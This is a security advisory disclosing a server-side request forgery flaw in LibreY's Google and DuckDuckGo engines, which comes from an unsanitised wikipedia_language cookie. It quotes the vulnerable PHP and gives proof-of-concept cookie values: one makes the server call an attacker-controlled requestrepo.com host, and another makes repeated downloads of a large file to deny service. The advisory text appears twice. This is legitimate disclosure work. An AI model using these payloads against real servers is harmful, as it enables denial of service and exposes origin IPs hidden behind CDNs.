Summary
Server-Side Request Forgery (SSRF) vulnerability in engines/google/text.php and engines/duckduckgo/text.php before commit be59098 allows remote attackers to request the server to send HTTP GET requests to arbitrary targets and conduct Denial-of-Service (DoS) attacks via the wikipedia_language cookie.
Details
In engines/google/text.php, the wikipedia_language cookie is used as the first part of the URL where a GET request is sent to.
|
case 7: |
|
$wikipedia_language = isset($_COOKIE["wikipedia_language"]) ? trim(htmlspecialchars($_COOKIE["wikipedia_language"])) : $config->wikipedia_language; |
|
$url = "https://$wikipedia_language.wikipedia.org/w/api.php?format=json&action=query&prop=extracts%7Cpageimages&exintro&explaintext&redirects=1&pithumbsize=500&titles=$query_encoded"; |
|
break; |
|
} |
|
|
|
if ($url != NULL) |
|
{ |
|
$special_ch = curl_init($url); |
If the cookie contains a slash, the domain is no longer wikipedia.org. If the cookie further ends with a hash sign, the .wikipedia.org/w/api.php?... will become the hash of the URL and the path of the request target can also be controlled by the attacker.
So the attacker can make the server send arbitrary GET requests, and DoS attacks can be conducted by requesting the server to download large files. If the server is behind a CDN, the original IP address can be disclosed via SSRF, so the DDoS protection provided by the CDN could be bypassed.
Fortunately, in engines/special/wikipedia.php, the response is decoded as JSON, so this is almost a blind SSRF where the attacker cannot see the response.
|
function wikipedia_results($query, $response) |
|
{ |
|
global $config; |
|
|
|
$query_encoded = urlencode($query); |
|
|
|
$json_response = json_decode($response, true); |
|
|
|
$first_page = array_values($json_response["query"]["pages"])[0]; |
|
|
|
if (!array_key_exists("missing", $first_page)) |
|
{ |
|
$description = substr($first_page["extract"], 0, 250) . "..."; |
|
|
|
$wikipedia_language = isset($_COOKIE["wikipedia_language"]) ? trim(htmlspecialchars($_COOKIE["wikipedia_language"])) : $config->wikipedia_language; |
|
|
|
$source = check_for_privacy_frontend("https://$wikipedia_language.wikipedia.org/wiki/$query"); |
|
$response = array( |
|
"special_response" => array( |
|
"response" => htmlspecialchars($description), |
|
"source" => $source |
|
) |
|
); |
|
|
|
if (array_key_exists("thumbnail", $first_page)) |
|
{ |
|
$image_url = $first_page["thumbnail"]["source"]; |
|
$response["special_response"]["image"] = $image_url; |
|
} |
|
|
|
return $response; |
|
} |
|
} |
PoC
SSRF
- Get a URL at https://requestrepo.com/, e.g.
xxx.requestrepo.com.
- Set
wikipedia_language to xxx.requestrepo.com/foo#.
- Search "bar".
- Observe a request for
https://xxx.requestrepo.com/foo at https://requestrepo.com/.
DoS
Send requests to /search.php?q=dos with header Cookie: wikipedia_language=speed.hetzner.de/100MB.bin# multiple times, and then send normal requests to see long response time or errors.
Impact
Remote attackers can request the server to download large files to reduce the performance of the server or even deny access from legitimate users.
Remote attackers can get the IP address of the server even if it is behind a CDN.
Patches
This has been fixed in #9.
LibreY hosters are advised to use the latest commit, and LibreX hosters are advised to migrate to LibreY.
ouuan Finder
Ahwxorg Coordinator
codedipper Remediation developer
Summary
Server-Side Request Forgery (SSRF) vulnerability in
engines/google/text.phpandengines/duckduckgo/text.phpbefore commit be59098 allows remote attackers to request the server to send HTTP GET requests to arbitrary targets and conduct Denial-of-Service (DoS) attacks via thewikipedia_languagecookie.Details
In
engines/google/text.php, thewikipedia_languagecookie is used as the first part of the URL where a GET request is sent to.LibreY/engines/google/text.php
Lines 55 to 63 in 3687c4b
If the cookie contains a slash, the domain is no longer
wikipedia.org. If the cookie further ends with a hash sign, the.wikipedia.org/w/api.php?...will become the hash of the URL and the path of the request target can also be controlled by the attacker.So the attacker can make the server send arbitrary GET requests, and DoS attacks can be conducted by requesting the server to download large files. If the server is behind a CDN, the original IP address can be disclosed via SSRF, so the DDoS protection provided by the CDN could be bypassed.
Fortunately, in
engines/special/wikipedia.php, the response is decoded as JSON, so this is almost a blind SSRF where the attacker cannot see the response.LibreY/engines/special/wikipedia.php
Lines 2 to 34 in 3687c4b
PoC
SSRF
xxx.requestrepo.com.wikipedia_languagetoxxx.requestrepo.com/foo#.https://xxx.requestrepo.com/fooat https://requestrepo.com/.DoS
Send requests to
/search.php?q=doswith headerCookie: wikipedia_language=speed.hetzner.de/100MB.bin#multiple times, and then send normal requests to see long response time or errors.Impact
Remote attackers can request the server to download large files to reduce the performance of the server or even deny access from legitimate users.
Remote attackers can get the IP address of the server even if it is behind a CDN.
Patches
This has been fixed in #9.
LibreY hosters are advised to use the latest commit, and LibreX hosters are advised to migrate to LibreY.